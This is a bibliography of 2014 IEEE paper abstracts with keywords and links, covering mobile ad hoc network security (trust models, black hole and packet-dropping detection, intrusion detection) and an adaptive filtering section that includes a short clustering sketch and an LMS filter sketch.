  • Khatri, P., "Using Identity And Trust With Key Management For Achieving Security in Ad hoc Networks," Advance Computing Conference (IACC), 2014 IEEE International, vol., no., pp.271,275, 21-22 Feb. 2014. Communication in a mobile ad hoc network is done over a shared wireless channel with no Central Authority (CA) to monitor it; the nodes in the network are held responsible for maintaining the integrity and secrecy of data. To attain the goal of trusted communication in a MANET (Mobile Ad hoc Network), many approaches using key management have been implemented. This work proposes a composite identity and trust based model (CIDT) which depends on the public key, physical identity, and trust of a node, and which helps in secure data transfer over wireless channels. CIDT is a modified DSR routing protocol for achieving security. The trust factor of a node, along with its key pair and identity, is used to authenticate the node in the network. The experience-based trust factor (TF) of a node is used to decide its authenticity, and a valid certificate is generated for each authentic node to carry out communication in the network. The proposed method works well for the self-certification scheme of a node in the network.
    Keywords: data communication; mobile ad hoc networks; routing protocols; telecommunication security; wireless channels; MANET; ad hoc networks; central authority; data integrity; data secrecy; experience based trust factor; identity model; key management; mobile ad hoc network; modified DSR routing protocol; physical identity; public key; secure data transfer; security; self certification scheme; shared wireless channel; trust factor; trust model; trusted communication; wireless channels; Artificial neural networks; Mobile ad hoc networks; Protocols; Public key; Servers; Certificate; MANET; Public key; Secret key; Trust Model (ID#:14-2012)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6779333&isnumber=6779283
  • Yanwei Wang; Yu, F.R.; Tang, H.; Minyi Huang, "A Mean Field Game Theoretic Approach for Security Enhancements in Mobile Ad hoc Networks," Wireless Communications, IEEE Transactions on, vol.13, no.3, pp.1616,1627, March 2014. Game theory can provide a useful tool to study the security problem in mobile ad hoc networks (MANETs). Most existing works on applying game theory to security consider only two players in the security game model: an attacker and a defender. While this assumption may be valid for a network with centralized administration, it is not realistic in MANETs, where centralized administration is not available. In this paper, using recent advances in mean field game theory, we propose a novel game theoretic approach with multiple players for security in MANETs. Mean field game theory provides a powerful mathematical tool for problems with a large number of players. The proposed scheme enables an individual node in a MANET to make strategic security defence decisions without centralized administration. In addition, since security defence mechanisms consume precious system resources (e.g., energy), the proposed scheme considers not only the security requirements of MANETs but also the system resources. Moreover, each node in the proposed scheme only needs to know its own state information and the aggregate effect of the other nodes in the MANET; therefore, the proposed scheme is fully distributed. Simulation results are presented to illustrate the effectiveness of the proposed scheme.
    Keywords: game theory; mobile ad hoc networks; telecommunication security; MANETs; centralized administration; fully distributed scheme; mathematical tool; mean field game theoretic approach; mobile ad hoc networks; security enhancements; security game model; strategic security defense decisions; system resources; Ad hoc networks; Approximation methods; Equations; Games; Mathematical model; Mobile computing; Security; Mean field game; mobile ad hoc network (MANET); security (ID#:14-2013)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6697928&isnumber=6776574
  • Ajamanickam, V.; Veerappan, D., "Inter cluster communication and rekeying technique for multicast security in mobile ad hoc networks," Information Security, IET , vol.8, no.4, pp.234,239, July 2014. Owing to dynamic topology changes in mobile ad hoc networks (MANETs), nodes have the freedom of movement. This characteristic necessitates the process of rekeying to secure multicast transmission. Furthermore, a secure inter cluster communication technique is also mandatory to improve the performance of multicast transmission. In this paper, we propose an inter cluster communication and rekeying technique for multicast security in MANET. The technique facilitates inter cluster communication by distributing private key shares to the nodes, which is performed by the centralised key manager. By tamper proofing the data using private key share, inter cluster communication is accomplished. Furthermore, the rekeying mechanism is invoked when a node joins the cluster. Our rekeying technique incurs low overhead and computation cost. Our technique is simulated in network simulator tool. The simulation results show the proficiency of our technique.
    Keywords: (not provided) (ID#:14-2014)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6842409&isnumber=6842405
  • Wei, Z.; Tang, H.; Yu, F.R.; Wang, M.; Mason, P., "Security Enhancements for Mobile Ad Hoc Networks with Trust Management Using Uncertain Reasoning," Vehicular Technology, IEEE Transactions on, vol. PP, no.99, pp.1,1, April 2014. The distinctive features of mobile ad hoc networks (MANETs), including dynamic topology and open wireless medium, may leave MANETs suffering from many security vulnerabilities. In this paper, using recent advances in uncertain reasoning originating from the artificial intelligence community, we propose a unified trust management scheme that enhances the security in MANETs. In the proposed trust management scheme, the trust model has two components: trust from direct observation and trust from indirect observation. With direct observation from an observer node, the trust value is derived using Bayesian inference, a type of uncertain reasoning applicable when the full probability model can be defined. With indirect observation, also called secondhand information obtained from neighbor nodes of the observer node, the trust value is derived using the Dempster-Shafer theory, another type of uncertain reasoning applicable when the proposition of interest can only be derived indirectly. Combining these two components in the trust model, we can obtain more accurate trust values of the observed nodes in MANETs. We then evaluate our scheme under the scenario of MANET routing. Extensive simulation results show the effectiveness of the proposed scheme; specifically, throughput and packet delivery ratio can be improved significantly, with only slightly increased average end-to-end delay and message overhead.
    Keywords: Ad hoc networks; Bayes methods; Cognition; Mobile computing; Observers; Routing; Security (ID#:14-2015)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6781620&isnumber=4356907
  • Dhurandher, Sanjay K.; Woungang, Isaac; Traore, Issa, "C-SCAN: An Energy-Efficient Network Layer Security Protocol for Mobile Ad Hoc Networks," Advanced Information Networking and Applications Workshops (WAINA), 2014 28th International Conference on, vol., no., pp.530,535, 13-16 May 2014. This paper continues the investigation of our recently proposed protocol (called E2-SCAN) designed for protecting against network layer attacks in mobile ad hoc networks. The enhancements of the E2-SCAN protocol are twofold: (1) a modified credit strategy for token renewal is introduced, and (2) a novel strategy for selecting the routing path is added, resulting in our so-called Conditional SCAN (C-SCAN). Simulation experiments are conducted, establishing the superiority of C-SCAN over E2-SCAN in terms of energy efficiency, where the energy efficiency of a node is defined as the ratio of the amount of energy consumed by the node to the total energy consumed by the network.
    Keywords: AODV; Mobile ad hoc networks (MANETs); credit-based strategy; energy efficiency; routing; security; token (ID#:14-2016)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6844691&isnumber=6844560
  • Hui Xia; Zhiping Jia; Sha, E.H.-M., "Research of trust model based on fuzzy theory in mobile ad hoc networks," Information Security, IET, vol.8, no.2, pp.88,103, March 2014. The performance of ad hoc networks depends on the cooperative and trusting nature of the distributed nodes. To enhance security in ad hoc networks, it is important to evaluate the trustworthiness of other nodes without central authorities. An information-theoretic framework is presented to quantitatively measure trust and build a novel trust model (FAPtrust) with multiple trust decision factors. These decision factors are incorporated to reflect the complexity and uncertainty of trust relationships from various angles. The weights of these factors are set using fuzzy analytic hierarchy process theory based on the entropy weight method, which gives the model better rationality. Moreover, a fuzzy logic rules prediction mechanism is adopted to update a node's trust for future decision-making. As an application of this model, a novel reactive trust-based multicast routing protocol is proposed. This new trusted protocol provides a flexible and feasible approach to routing decision-making, taking into account both the trust constraint and malicious node detection in multi-agent systems. Comprehensive experiments have been conducted to evaluate the efficiency of the trust model and of multicast trust enhancement in improving network interaction quality, trust dynamic adaptability, malicious node identification, attack resistance, and the system's security.
    Keywords: analytic hierarchy process; decision making; fuzzy set theory; mobile ad hoc networks; multi-agent systems; multicast protocols; routing protocols; telecommunication security; FAPtrust; decision-making; entropy weight method; fuzzy analytic hierarchy process theory; fuzzy logic; fuzzy theory; information-theoretic framework; malicious node detection; mobile ad hoc network security; multi-agent system; multiple trust decision factor; network interaction quality; network trust dynamic adaptability; trust model; trust-based multicast routing protocol (ID#:14-2017)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6748543&isnumber=6748540
  • Singh, M.P.; Manjul, Manisha; Yadav, Manisha, "Hash based efficient secure routing for network communication," Computing for Sustainable Global Development (INDIACom), 2014 International Conference on, vol., no., pp.881,888, 5-7 March 2014. Mobile ad-hoc networks are a new field in networking because they work as autonomous networks, and their applications have been increasing day by day in recent years. It is therefore increasingly important to provide suitable routing protocols and security against attackers. Mobile ad-hoc networks today face many problems, such as small bandwidth, limited energy, security, limited computational capability, and high mobility. In contrast, infrastructure wireless networks have larger bandwidth, larger memory, and power backup, and different routing protocols apply easily. In mobile ad-hoc networks, some of these advantages are lost due to mobility and small power backup, so routing protocols that consume little energy during packet transfer are required. Many challenging research problems thus remain in mobile ad-hoc networks, related to routing protocols, security issues, the energy problem, and more. Our research is dedicated to authentication in mobile ad-hoc networks.
    Keywords: Ad hoc networks; Mobile communication; Mobile computing; Routing; Routing protocols; Security; Attack; Mobile Ad-hoc; Security; WLAN (ID#:14-2018)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6828090&isnumber=6827395
  • Biagioni, E., "Ubiquitous Interpersonal Communication over Ad-hoc Networks and the Internet," System Sciences (HICSS), 2014 47th Hawaii International Conference on , vol., no., pp.5144,5153, 6-9 Jan. 2014. The hardware and low-level software in many mobile devices are capable of mobile-to-mobile communication, including ad-hoc 802.11, Bluetooth, and cognitive radios. We have started to leverage this capability to provide interpersonal communication both over infrastructure networks (the Internet), and over ad-hoc and delay-tolerant networks composed of the mobile devices themselves. This network is decentralized in the sense that it can function without any infrastructure, but does take advantage of infrastructure connections when available. All interpersonal communication is encrypted and authenticated so packets may be carried by devices belonging to untrusted others. The decentralized model of security builds a flexible trust network on top of the social network of communicating individuals. This social network can be used to prioritize packets to or from individuals closely related by the social network. Other packets are prioritized to favor packets likely to consume fewer network resources. Each device also has a policy that determines how many packets may be forwarded, with the goal of providing useful interpersonal communications using at most 1% of any given resource on mobile devices. One challenge in a fully decentralized network is routing. Our design uses Rendezvous Points (RPs) and Distributed Hash Tables (DHTs) for delivery over infrastructure networks, and hop-limited broadcast and Delay Tolerant Networking (DTN) within the wireless ad-hoc network.
    Keywords: Bluetooth; Internet; cognitive radio; cryptography; delay tolerant networks; mobile ad hoc networks; mobile computing; packet radio networks; telecommunication network routing; wireless LAN; Bluetooth; DHT; DTN; Internet; RP; ad-hoc 802.11 networks; authentication; cognitive radio; decentralized model; decentralized network routing; delay tolerant networking; distributed hash tables; encryption; flexible trust network; hop-limited broadcast; low-level software; mobile devices; mobile-to-mobile communication; rendezvous points; social network; ubiquitous interpersonal communication; Ad hoc networks; IP networks; Internet; Public key; Receivers; Social network services; Wireless communication; Ad-Hoc Network; Delay-Tolerant Network; Infrastructureless Communication; Interpersonal Communication; Networking Protocol; Priority Mechanism (ID#:14-2019)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6759236&isnumber=6758592
  • Sarma, K.J.; Sharma, R.; Das, R., "A survey of Black hole attack detection in Manet," Issues and Challenges in Intelligent Computing Techniques (ICICT), 2014 International Conference on, vol., no., pp.202,205, 7-8 Feb. 2014. A MANET is an infrastructure-less, dynamic, decentralised network. Any node can join or leave the network at any point of time. Due to its simplicity and flexibility, it is widely used in military communication, emergency communication, academic settings, and mobile conferencing. Since a MANET has no infrastructure, each node acts as both host and router, connected to the others by a peer-to-peer network. Decentralised means there is no distinction between client and server: each and every node acts as both a client and a server. Due to the dynamic nature of mobile ad-hoc networks, they are more vulnerable to attack, and since any node can join or leave the network without permission, the security issues are more challenging than in other types of network. One of the major security problems in ad hoc networks is called the black hole problem. It occurs when a malicious node, referred to as a black hole, joins the network. The black hole conducts its malicious behavior during the process of route discovery: for any received RREQ, the black hole claims to have a route and propagates a faked RREP. The source node responds to these faked RREPs and sends its data through the received routes; once the data is received by the black hole, it is dropped instead of being sent to the desired destination. This paper discusses some of the techniques put forward by researchers to detect and prevent black hole attacks in MANETs using the AODV protocol, and, based on their flaws, a new methodology is also proposed.
    Keywords: client-server systems; mobile ad hoc networks; network servers; peer-to-peer computing; radiowave propagation; routing protocols; telecommunication security; AODV protocol; MANET; academic purpose; black hole attack detection; client; decentralized network; emergency communication; military communication; mobile ad-hoc network; mobile conferencing; peer-to-peer network; received RREQ; route discovery; security; server; Europe; Mobile communication; Routing protocols; Ad-HOC; Black hole attack; MANET; RREP; RREQ (ID#:14-2020)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6781279&isnumber=6781240
  • Chaudhary, A; Kumar, A; Tiwari, V.N., "A reliable solution against Packet dropping attack due to malicious nodes using fuzzy Logic in MANETs," Optimization, Reliabilty, and Information Technology (ICROIT), 2014 International Conference on, vol., no., pp.178,181, 6-8 Feb. 2014. The recent trend of mobile ad hoc networks increases the ability and impregnability of communication between mobile nodes. Mobile ad hoc networks are completely free from pre-existing infrastructure or authentication points, so all present mobile nodes that want to communicate with each other immediately form the topology and initiate requests for data packets to send or receive. From a security perspective, communication between mobile nodes via wireless links makes these networks more susceptible to internal or external attacks, because anyone can join or leave the network at any time. In general, the packet dropping attack through malicious node(s) is one of the possible attacks in a mobile ad hoc network. This paper develops an intrusion detection system using fuzzy logic to detect packet dropping attacks in mobile ad hoc networks, and also removes the malicious nodes in order to save the resources of mobile nodes. From the implementation point of view, the Qualnet 6.1 simulator and a Mamdani fuzzy inference system are used to analyze the results. Simulation results show that the system is capable of detecting dropping attacks with a high detection rate and a low false positive rate.
    Keywords: fuzzy logic; inference mechanisms; mobile ad hoc networks; mobile computing; security of data; MANET; Mamdani fuzzy inference system; Qualnet simulator 6.1; data packets; fuzzy logic; intrusion detection system; malicious nodes; mobile ad hoc network; mobile nodes; packet dropping attack; wireless links; Ad hoc networks; Artificial intelligence; Fuzzy sets; Mobile computing; Reliability engineering; Routing; Fuzzy Logic; Intrusion Detection System (IDS); MANETs Security Issues; Mobile Ad Hoc networks (MANETs); Packet Dropping attack (ID#:14-2021)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798326&isnumber=6798279
  • Sakharkar, S.M.; Mangrulkar, R.S.; Atique, M., "A survey: A secure routing method for detecting false reports and gray-hole attacks along with Elliptic Curve Cryptography in wireless sensor networks," Electrical, Electronics and Computer Science (SCEECS), 2014 IEEE Students' Conference on, vol., no., pp.1,5, 1-2 March 2014. Wireless Sensor Networks (WSNs) are used in many applications in military, environmental, and health-related areas. These applications often include the monitoring of sensitive information such as enemy movement on the battlefield or the location of personnel in a building. Security is important in WSNs; however, WSNs suffer from many constraints, including low computation capability, small memory, limited energy resources, susceptibility to physical capture, and the use of insecure wireless communication channels. These constraints make security in WSNs a challenge. In this paper, we explore security issues in WSNs. First, the constraints, security requirements, and attacks with their corresponding countermeasures in WSNs are explained. Individual sensor nodes are subject to compromise, and an adversary can inject false reports into the network via compromised nodes; furthermore, an adversary can create a gray hole through compromised nodes. If these two kinds of attacks occur simultaneously in a network, some of the existing methods fail to defend against them. The Ad-hoc On-demand Distance Vector (AODV) scheme is used for detecting gray-hole attacks, and Statistical En-Route Filtering is used for detecting false reports. To increase the security level, the Elliptic Curve Cryptography (ECC) algorithm is used. The simulation results obtained so far show reduced energy consumption and, to some extent, greater network security.
    Keywords: public key cryptography; routing protocols; wireless sensor networks; AODV protocol; Gray hole attack; ad hoc on demand distance vector protocol; elliptic curve cryptography; false report detection; individual sensor nodes; secure routing method; statistical en-route filtering; wireless sensor networks; Base stations; Elliptic curve cryptography; Protocols; Routing; Wireless sensor networks; AODV; ECC; Secure Routing; Security; Statistical En-Route; Wireless Sensor Network (ID#:14-2022)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6804514&isnumber=6804412
  • Turguner, Cansin, "Secure fault tolerance mechanism of wireless Ad-Hoc networks with mobile agents," Signal Processing and Communications Applications Conference (SIU), 2014 22nd, vol., no., pp.1620,1623, 23-25 April 2014. Mobile Ad-Hoc Networks are dynamic, wireless, self-organizing networks in which many mobile nodes are weakly connected to each other. Compared with traditional networks, they suffer failures that prevent the system from working properly. Nevertheless, we have to cope with many security issues such as unauthorized attempts, security threats, and reliability. Using mobile agents in ad-hoc networks with low-level fault tolerance provides fault masking that the users never notice. Mobile agent migration among nodes, autonomous selection of alternative paths, and high-level fault tolerance make networks with low bandwidth and high failure ratios more reliable. In this paper we describe the fault tolerance peculiarities of mobile agents and existing fault tolerance methods based on mobile agents. For ad-hoc networks that need security precautions beyond fault tolerance, we also present a new model: the Secure Mobile Agent Based Fault Tolerance Model.
    Keywords: Ad hoc networks; Conferences; Erbium; Fault tolerance; Fault tolerant systems; Mobile agents; Signal processing; Ad-Hoc network; fault tolerance; mobile agent; related works; secure communication (ID#:14-2023)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6830555&isnumber=6830164
  • Barani, F., "A hybrid approach for dynamic intrusion detection in ad hoc networks using genetic algorithm and artificial immune system," Intelligent Systems (ICIS), 2014 Iranian Conference on, vol., no., pp.1,6, 4-6 Feb. 2014. A mobile ad hoc network (MANET) is a self-created and self-organized network of wireless mobile nodes. Due to the special characteristics of these networks, security is a difficult task to achieve; hence, applying current intrusion detection techniques developed for fixed networks is not sufficient for MANETs. In this paper, we propose an approach based on a genetic algorithm (GA) and an artificial immune system (AIS), called GAAIS, for dynamic intrusion detection in AODV-based MANETs. GAAIS is able to adapt itself to network topology changes using two updating methods: partial and total. Each normal feature vector extracted from network traffic is represented by a hypersphere with fixed radius. A set of spherical detectors is generated using the NicheMGA algorithm to cover the nonself space, and these spherical detectors are used to detect anomalies in network traffic. The performance of GAAIS is evaluated in detecting several types of routing attacks simulated using the NS2 simulator, such as Flooding, Blackhole, Neighbor, Rushing, and Wormhole. Experimental results show that GAAIS is more efficient in comparison with similar approaches.
    Keywords: artificial immune systems; feature extraction; genetic algorithms; mobile ad hoc networks; security of data; telecommunication network routing; telecommunication network topology; telecommunication security; telecommunication traffic; AIS; AODV-based MANET; GA; NS2 simulator; NicheMGA algorithm; artificial immune system; blackhole simulator; dynamic intrusion detection technique; flooding simulator; genetic algorithm; mobile ad hoc network; neighbor simulator; network topology; network traffic; normal feature vector extraction; routing attack simulation; rushing simulator; security; spherical detector; wireless mobile node; wormhole simulator; Biological cells; Detectors; Feature extraction; Heuristic algorithms; Intrusion detection; Routing protocols; Vectors; Ad hoc network; Artificial immune system; Genetic algorithm; Intrusion detection; Routing attack (ID#:14-2024)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6802607&isnumber=6798982
  • Soleimani, Mohammad Taqi; Kahvand, Mahboubeh, "Defending packet dropping attacks based on dynamic trust model in wireless ad hoc networks," Mediterranean Electrotechnical Conference (MELECON), 2014 17th IEEE, vol., no., pp.362,366, 13-16 April 2014. Rapid advances in wireless ad hoc networks have led to an increase in their real-life applications. Since wireless ad hoc networks have no centralized infrastructure and management, they are vulnerable to several security threats. Malicious packet dropping is a serious attack against these networks, in which an adversary node tries to drop all or some of the received packets instead of forwarding them to the next hop along the path. A dangerous type of this attack is called the black hole: after absorbing network traffic, the malicious node drops all received packets to form a denial of service (DoS) attack. In this paper, a dynamic trust model to defend the network against this attack is proposed. In this approach, a node initially trusts all immediate neighbors; getting feedback from its neighbors' behaviors, the node updates the corresponding trust values. The simulation results using NS-2 show that the attack is detected successfully with a low false positive probability.
    Keywords: Computers; Conferences; Mobile ad hoc networks; Routing; Routing protocols; Vectors; AODV; Black hole attack; Packet dropping; Security; Trust management; Wireless ad hoc network; reactive routing protocol (ID#:14-2025)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6820561&isnumber=6820492
  • Saini, Vinay Kumar; Kumar, Vivek, "AHP, fuzzy sets and TOPSIS based reliable route selection for MANET," Computing for Sustainable Global Development (INDIACom), 2014 International Conference on, vol., no., pp.24,29, 5-7 March 2014. Route selection is a very sensitive activity for a mobile ad-hoc network (MANET), and ranking multiple routes from source node to destination node can result in effective route selection and provide many other benefits for better performance and security of the MANET. This paper proposes an evaluation model based on the analytical hierarchy process (AHP), fuzzy sets, and the technique for order performance by similarity to ideal solution (TOPSIS) to provide a useful solution for ranking routes. The proposed model utilizes AHP to acquire criteria weights, fuzzy sets to describe vagueness with linguistic values and triangular fuzzy numbers, and TOPSIS to obtain the final ranking of routes. The final ranking facilitates selection of the best and most reliable route and provides alternative options for making a robust mobile ad-hoc network.
    Keywords: Fuzzy logic; Fuzzy sets; Mobile ad hoc networks; Pragmatics; Routing; Routing protocols; AHP; Fuzzy sets; MCDM; Manet; TOPSIS (ID#:14-2026)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6828006&isnumber=6827395
  • Sumit, S.; Mitra, D.; Gupta, D., "Proposed Intrusion Detection on ZRP based MANET by effective k-means clustering method of data mining," Optimization, Reliabilty, and Information Technology (ICROIT), 2014 International Conference on, vol., no., pp.156,160, 6-8 Feb. 2014. Mobile Ad-Hoc Networks (MANETs) consist of peer-to-peer, infrastructure-less communicating nodes that are highly dynamic; as a result, routing data becomes more challenging. Routing protocols for such networks face the challenges of random topology changes, the nature of the link (symmetric or asymmetric), and power requirements during data transmission. Under such circumstances both proactive and reactive routing are usually inefficient. We consider the zone routing protocol (ZRP), which combines the qualities of the proactive (IARP) and reactive (IERP) protocols. In ZRP, an updated topological map of the zone centered on each node is maintained, and immediate routes are available inside each zone. To communicate outside a zone, a route discovery mechanism is employed, aided by the local routing information of the zones. In a MANET, security is always an issue: a node can turn malicious and hamper the normal flow of packets. To overcome this, we use a clustering technique to separate nodes with intrusive behavior from those with normal behavior. We call this technique effective k-means clustering, as it is motivated by k-means (a toy sketch of this clustering step appears just after this list). We propose to implement an Intrusion Detection System on each node of the MANET, which uses ZRP for packet flow, and then use effective k-means to separate the malicious nodes from the network. Thus, our ad-hoc network will be free from malicious activity and the normal flow of packets will be possible.
    Keywords: data mining; mobile ad hoc networks; mobile computing; peer-to-peer computing; routing protocols; telecommunication security; K-means clustering method; MANET security; ZRP based MANET; ad-hoc network; clustering technique; data mining; data transmission; intrusion detection system; intrusive behavior; k-means; local routing information; malicious activity; malicious nodes; mobile ad-hoc networks; packet flow; peer-to-peer infrastructure; proactive protocols; random topology; reactive protocols; route discovery mechanism; route discovery procedure; routing data; zone routing protocol; Flowcharts; Mobile ad hoc networks; Mobile computing; Protocols; Routing; IARP; IDS; effective k-means clustering; IERP; MANET; ZRP (ID#:14-2027)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6798303&isnumber=6798279
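
As referenced in the last entry above, here is a toy sketch of the clustering step: separating nodes with intrusive behavior from normal ones using per-node traffic features. The features are hypothetical, not those of the paper:

    import numpy as np
    from sklearn.cluster import KMeans

    # Per-node features: [forward ratio, drop ratio, route-request rate]
    features = np.array([[0.98, 0.02, 1.0],    # normal nodes
                         [0.97, 0.03, 1.2],
                         [0.95, 0.05, 0.9],
                         [0.20, 0.80, 9.5],    # suspected malicious nodes
                         [0.15, 0.85, 8.7]])

    km = KMeans(n_clusters=2, n_init=10, random_state=0).fit(features)
    # The anomalous cluster is flagged for removal from the MANET.
    print(km.labels_)   # e.g., [0 0 0 1 1]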

Note:

Articles listed on these pages have been found on publicly available internet pages and are cited with links to those pages. Some of the information included herein has been reprinted with permission from the authors or data repositories. Direct any requests via Email to SoS.Project (at) SecureDataBank.net for removal of the links or modifications to specific citations. Please include the ID# of the specific citation in your correspondence.


Adaptive Filtering



As the power of digital signal processors has increased, adaptive filters are now routinely used in many devices as varied as mobile phones, printers, cameras, power systems, GPS devices, and medical monitoring equipment. An adaptive filter is a system with a linear filter whose transfer function is controlled by variable parameters, together with an optimization algorithm that adjusts those parameters. Because of the complexity of the optimization algorithms, most adaptive filters are digital filters. They are required in applications where some parameters of the desired processing operation are not known in advance or are changing. The articles below were published from January through August, 2014.
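
As a minimal illustration before the list: the least-mean-squares (LMS) algorithm is the canonical optimization rule for such filters. The sketch below, with illustrative parameters, adapts an FIR filter to identify an unknown 4-tap system from its noisy output:

    import numpy as np

    def lms_filter(x, d, num_taps=8, mu=0.01):
        """LMS adaptive FIR filter: adjust weights w so the output tracks d."""
        w = np.zeros(num_taps)
        e = np.zeros(len(x))
        for n in range(num_taps - 1, len(x)):
            u = x[n - num_taps + 1:n + 1][::-1]   # [x[n], x[n-1], ...]
            y = w @ u                             # filter output
            e[n] = d[n] - y                       # error drives the adaptation
            w = w + 2 * mu * e[n] * u             # LMS weight update
        return e, w

    rng = np.random.default_rng(0)
    x = rng.standard_normal(5000)
    unknown = np.array([0.6, -0.3, 0.2, 0.1])
    d = np.convolve(x, unknown)[:len(x)] + 0.01 * rng.standard_normal(len(x))
    _, w = lms_filter(x, d, num_taps=4, mu=0.02)
    print(np.round(w, 2))   # converges near [0.6, -0.3, 0.2, 0.1]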

  • Markman, A; Javidi, B.; Tehranipoor, M., "Photon-Counting Security Tagging and Verification Using Optically Encoded QR Codes," Photonics Journal, IEEE, vol.6, no.1, pp.1,9, Feb. 2014. We propose an optical security method for object authentication using photon-counting encryption implemented with phase encoded QR codes. By combining the full phase double-random-phase encryption with photon-counting imaging method and applying an iterative Huffman coding technique, we are able to encrypt and compress an image containing primary information about the object. This data can then be stored inside of an optically phase encoded QR code for robust read out, decryption, and authentication. The optically encoded QR code is verified by examining the speckle signature of the optical masks using statistical analysis. Optical experimental results are presented to demonstrate the performance of the system. In addition, experiments with a commercial Smartphone to read the optically encoded QR code are presented. To the best of our knowledge, this is the first report on integrating photon-counting security with optically phase encoded QR codes.
    Keywords: Huffman codes; cryptography; image coding; iterative methods; masks; phase coding; photon counting; smart phones; speckle; statistical analysis; commercial Smartphone; decryption; full phase double-random-phase encryption; image compressing; image encryption; iterative Huffman coding; object authentication; optical masks; optical security method; optically phase encoded QR code; photon-counting encryption; photon-counting imaging; photon-counting security tagging; robust read out; speckle signature; statistical analysis; Adaptive optics; Cryptography; Nonlinear optics; Optical filters; Optical imaging; Optical polarization; Photonics; Optical security and encryption; coherent imaging; photon counting imaging; speckle (ID#:14-2028)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6685832&isnumber=6689334
  • Tsilopoulos, C.; Xylomenos, G.; Thomas, Y., "Reducing forwarding state in content-centric networks with semi-stateless forwarding," INFOCOM, 2014 Proceedings IEEE , vol., no., pp.2067,2075, April 27 2014-May 2 2014. Routers in the Content-Centric Networking (CCN) architecture maintain state for all pending content requests, so as to be able to later return the corresponding content. By employing stateful forwarding, CCN supports native multicast, enhances security and enables adaptive forwarding, at the cost of excessive forwarding state that raises scalability concerns. We propose a semi-stateless forwarding scheme in which, instead of tracking each request at every on-path router, requests are tracked at every d hops. At intermediate hops, requests gather reverse path information, which is later used to deliver responses between routers using Bloom filter-based stateless forwarding. Our approach effectively reduces forwarding state, while preserving the advantages of CCN forwarding. Evaluation results over realistic ISP topologies show that our approach reduces forwarding state by 54%-70% in unicast delivery, without any bandwidth penalties, while in multicast delivery it reduces forwarding state by 34%-55% at the expense of 6%-13% in bandwidth overhead.
    Keywords: computer networks; data structures; topology; Bloom filter-based stateless forwarding; CCN architecture; ISP topologies; adaptive forwarding; content-centric networking architecture; semi-stateless forwarding scheme; unicast delivery; Bandwidth; Computer architecture; Computers; Conferences; Ports (Computers); Probabilistic logic; Unicast (ID#:14-2029)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6848148&isnumber=6847911
  • Boruah, A; Hazarika, S.M., "An MEBN framework as a dynamic firewall's knowledge flow architecture," Signal Processing and Integrated Networks (SPIN), 2014 International Conference on, vol., no., pp.249,254, 20-21 Feb. 2014. Dynamic firewalls with stateful inspection have added many security features over traditional stateless static filters, and dynamic firewalls need to be adaptive. In this paper, we have designed a framework for dynamic firewalls based on a probabilistic ontology using Multi Entity Bayesian Networks (MEBN) logic. MEBN extends ordinary Bayesian networks to allow representation of graphical models with repeated substructures and can express a probability distribution over models of any consistent first-order theory. Our proposed work is motivated by the prevention of novel attacks (i.e., attacks for which no signatures have yet been generated). The proposed framework has two important parts: the first is the data flow architecture, which extracts important connection-based features with the prime goal of explicit rule inclusion into the firewall's rule base; the second is the knowledge flow architecture, which uses a semantic threat graph as well as reasoning under uncertainty to provide a futuristic threat prevention technique in dynamic firewalls.
    Keywords: belief networks; data flow computing; firewalls; ontologies (artificial intelligence); statistical distributions; MEBN framework; MEBN logic; data flow architecture; dynamic firewalls; first order theory; futuristic threat prevention technique; graphical models; knowledge flow architecture; multi entity Bayesian networks; probabilistic ontology; probability distribution; security features; stateful inspection; stateless traditional static filters; Bayes methods; Feature extraction; Ontologies; Probabilistic logic; Semantics; Signal processing algorithms; Bayesian networks; MEBN; Probabilistic Ontology; explicit rule inclusion; semantic threat graph (ID#:14-2030)
    URL: http://ieeexplore.ieee.org/stamp/stamp.jsp?tp=&arnumber=6776957&isnumber=6776904
  • Jian Wang; Lin Mei; Yi Li; Jian-Ye Li; Kun Zhao; Yuan Yao, "Variable Window for Outlier Detection and Impulsive Noise Recognition in Range Images," Cluster, Cloud and Grid Computing (CCGrid), 2014 14th IEEE/ACM International Symposium on , vol., no., pp.857,864, 26-29 May 2014. To improve the comprehensive performance of denoising range images, an impulsive noise (IN) denoising method with variable windows is proposed in this paper. Founded on several discriminant criteria, the principles of dropout IN detection and outlier IN detection are provided. Subsequently, a nearest non-IN neighbors searching process and an Index Distance Weighted Mean filter are combined for IN denoising. As key factors in the adaptability of the proposed denoising method, the sizes of the two windows for outlier IN detection and IN denoising are investigated. Based on a theoretical model of invader occlusion, a variable window is presented for adapting window size to the dynamic environment of each point, accompanied by practical criteria for adaptive variable window size determination. Experiments on real range images of multi-line surfaces are conducted, with evaluations in terms of computational complexity and quality assessment, including comparison analysis against a few other popular methods. Results indicate that the proposed method detects impulsive noises with high accuracy and, with the help of the variable window, denoises them with strong adaptability.
    Keywords: computational complexity; image denoising; image recognition; impulse noise; adaptive variable window size determination; computational complexity; discriminant criteria; dropout IN detection; dynamic environment; impulsive noise denoising; impulsive noise recognition; index distance weighted mean filter; invader occlusion; multiline surface; nearest non-IN neighbors searching process; outlier IN detection; quality assessment; range image denoising; Algorithm design and analysis; Educational institutions; Image denoising; Indexes; Noise; Noise reduction; Wavelet transforms; Impulsive noise recognition; Index Distance Weighted Mean filter; Outlier detection; Range image denoising; Variable window (ID#:14-2031)
